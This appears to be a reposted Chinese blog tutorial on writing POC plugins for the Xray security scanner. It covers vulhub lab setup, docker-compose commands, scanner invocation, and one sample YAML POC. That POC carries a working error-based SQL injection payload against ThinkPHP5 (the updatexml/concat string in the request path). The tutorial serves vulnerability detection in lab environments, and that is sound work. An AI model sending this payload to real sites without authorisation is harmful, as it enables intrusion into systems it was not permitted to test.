Xray写POC插件

Xray写POC插件漏洞环境https://www.vulnhub.com/https://github.com/vulhub/vulhubhttps://github.com/QAX-A-Team/WeblogicEnvironment启用、关闭命令#启用环境docker-composeup-d环境关闭docker-composedown查看WEB应用容器root@…

大家好,又见面了,我是你们的朋友全栈君。

漏洞环境

  • https://www.vulnhub.com/
  • https://github.com/vulhub/vulhub
  • https://github.com/QAX-A-Team/WeblogicEnvironment

启用、关闭命令

# 启用环境
docker-compose up -d

环境关闭

docker-compose down

查看 WEB 应用容器

root@kali:/opt/vulhub/zabbix/CVE-2016-10134# docker ps
CONTAINER ID        IMAGE                        COMMAND                  CREATED             STATUS                      PORTS                  NAMES
b699f35aa2c8        vulhub/zabbix:3.0.3-server   "/docker-entrypoint.…"   30 minutes ago      Up 30 minutes (unhealthy)   162/udp, 10051/tcp     cve-2016-10134_agent_1
05cf05dacf6d        vulhub/zabbix:3.0.3-web      "/docker-entrypoint.…"   30 minutes ago      Up 30 minutes (healthy)     0.0.0.0:8080->80/tcp   cve-2016-10134_web_1
be0b0d3e74a7        mysql:5                      "docker-entrypoint.s…"   30 minutes ago      Up 30 minutes               3306/tcp, 33060/tcp    cve-2016-10134_mysql_1


# 意思是容器的80端口映射到主机的8080端口上
0.0.0.0:8080->80/tcp

资料

https://www.runoob.com/docker/docker-container-usage.html

https://vulhub.org/

https://github.com/Medicean/VulApps/

POC文档

  • https://chaitin.github.io/xray/#/guide/poc 编写说明

工具

  • https://github.com/chaitin/xray XRay 安全评估工具
  • https://phith0n.github.io/xray-poc-generation/ 在线辅助生成 XRay YAML POC
  • https://github.com/phith0n/xray-poc-generation 在线辅助生成 XRay YAML POC 源码

参考源码

  • https://github.com/chaitin/xray/tree/master/pocs 已经提交的POC源码

Xray的POC插件测试

  • 只运行单个内置 POC

在 xray 中,所有的 poc 隶属于插件 phantasm, 所以使用 poc 时需要开启 phantasm 插件才可生效。–poc 参数指定本次运行的 poc,如不指定,将运行所有的内置 poc。

xray webscan --plugins phantasm --poc /home/test/1.yaml --url http://example.com/

加载 /home/test/pocs/ 所有的 POC:

xray webscan --plugins phantasm --poc "/home/test/pocs/*"

加载 /home/test/pocs/ 下包含 thinkphp 的 POC

xray webscan --plugins phantasm --poc "/home/test/pocs/*thinkphp*"
  • https://paper.seebug.org/9/ 写通用POC需要注意的问题

thinkphp5-in-sqlinjection

name: thinkphp5-in-sqlinjection
rules:
  - method: GET
    path: /index.php?ids[0,updatexml(0,concat(0xa,MD5(8888)),0)]=1
    expression: |
      body.bcontains(b'cf79ae6addba60ad018347359bd144d')
detail:
  author: 17bdw
  Affected Version: "thinkphp5-in-sqlinjection"
  vuln_url: "/index.php?ids[0,updatexml(0,concat(0xa,MD5(8888)),0)]=1"
  links:
    - https://github.com/vulhub/vulhub/tree/master/thinkphp/in-sqlinjection

转载于:https://www.cnblogs.com/17bdw/p/11468478.html

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/139218.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(1)


相关推荐

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号